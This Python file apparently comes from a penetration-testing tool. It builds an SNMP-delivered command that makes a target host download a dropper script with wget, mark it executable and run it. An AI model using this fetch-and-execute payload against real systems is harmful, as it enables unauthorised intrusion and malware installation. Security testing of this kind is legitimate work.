from agentpluginapi import (
    DropperExecutionMode,
    ILinuxAgentCommandBuilder,
    LinuxDownloadMethod,
    LinuxDownloadOptions,
    LinuxRunOptions,
    LinuxSetPermissionsOptions,
    TargetHost,
)
from plugintoolbox import get_dropper_script_dst_path


def build_snmp_command(
    target_host: TargetHost,
    agent_download_url: str,
    agent_command_builder: ILinuxAgentCommandBuilder,
) -> str:
    dropper_script_dst_path = get_dropper_script_dst_path(target_host)
    download_options = LinuxDownloadOptions(
        download_method=LinuxDownloadMethod.WGET,
        download_url=agent_download_url,
        agent_destination_path=dropper_script_dst_path,
    )
    permission_options = LinuxSetPermissionsOptions(
        agent_destination_path=dropper_script_dst_path,
        permissions=0o700,
    )
    run_options = LinuxRunOptions(
        dropper_execution_mode=DropperExecutionMode.SCRIPT,
        agent_destination_path=dropper_script_dst_path,
    )
    agent_command_builder.build_download_command(download_options)
    agent_command_builder.build_set_permissions_command(permission_options)
    agent_command_builder.build_run_command(run_options)

    return f'-c "{agent_command_builder.get_command()}"'
